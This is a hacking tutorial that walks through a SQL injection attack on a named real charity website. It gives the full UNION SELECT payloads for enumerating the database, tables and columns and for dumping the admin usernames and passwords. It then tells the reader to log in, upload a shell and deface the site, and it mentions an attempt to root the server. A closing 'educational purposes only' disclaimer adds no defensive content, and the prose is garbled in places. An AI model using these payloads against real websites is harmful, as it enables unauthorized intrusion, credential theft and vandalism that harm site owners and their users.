SQL Injection for Hacking a Vulnerable Website
SQL Injection for Hacking
Hacking a vulnerable website with SQL injection allows you to obtain usernames and also passwords, possibly access the admin account, and from there you could do whatever you wanted to the website really. When Anonymous hacked Sony and obtained personal information of thousands of users.. they used an advanced form of this hack. then This hack can be done from any computer or device with an internet connection and a browser.
- Find a vulnerable website. also One way you can do this is by using what is called a google dork. In the Hacking websites section of this app, you can find a huge list of dorks. Simply go to google and type inurl:dorkhere
- When you have a target URL like: http://cadaboutdrugs.ie/news.php?id=82, add a ‘ at the end so it looks likehttp://cadaboutdrugs.ie/news.php?id=82’
- The site will be vulnerable to this hack if you also get an error, or some of the websites content vanishes. If none of these things happen, this website is not vulnerable to SQLi
- For the site used above, there is no error but content has vanished. It is vulnerable.
- Now try for ORDER BY syntax.
1 ORDER BY 2 ORDER BY 3 ORDER BY
4 ORDER BY
I have tried upto 90 but I cant Find any Error.
- Next step to Apply UNION syntax.
- Now at UNION SELECT 1,2,3,4,5,6,7,8– you will see some vulnerable number on screen e.g. 2 3 4
- Now found Version of MySQL, User, and Database Name.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,@@version,user(),database(),5,6,7,8–
- Now you will see the following output :
5.1.49-log —> MySQL Versionaboutdr_admin@web8.novara.ie —> Useraboutdr_Test —> Database Name
- Now found All tables name in database
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()–
- We got our all table –>[about,carousel,contact,documents,donate,intro,links,members,news,services] in which we also got our Important table which stored admin username password is –> members
- Find columns names of members table. goto http://home2.paulschou.net/tools/xlate/ website.
- Copy members without quotes into [ TEXT ] also field and Press
- Now We got the value 109 101 109 98 101 114 115 from [ DEC / CHAR ] field.
- Now our query to find column names of members table will then be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=CHAR(109,101,109,98,101,114,115)–
- Now we got all column names from members tables.–>id,username,password
- Now find username password the query will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(id,0x3a,username,0x3a,password),3,4,5,6,7,8 FROM members–
- Here we got id, username and then password and 0x3a stands for –> [:] (colon)
- Now go to Home page of site Click on Admin Login. Login with username password and also Upload your shell feel free to deface or upload any page.
As always, this is for educational purposes only. Use at your own risk.
I tried this server for root but Unfortunately its patched server so It cant be rooted.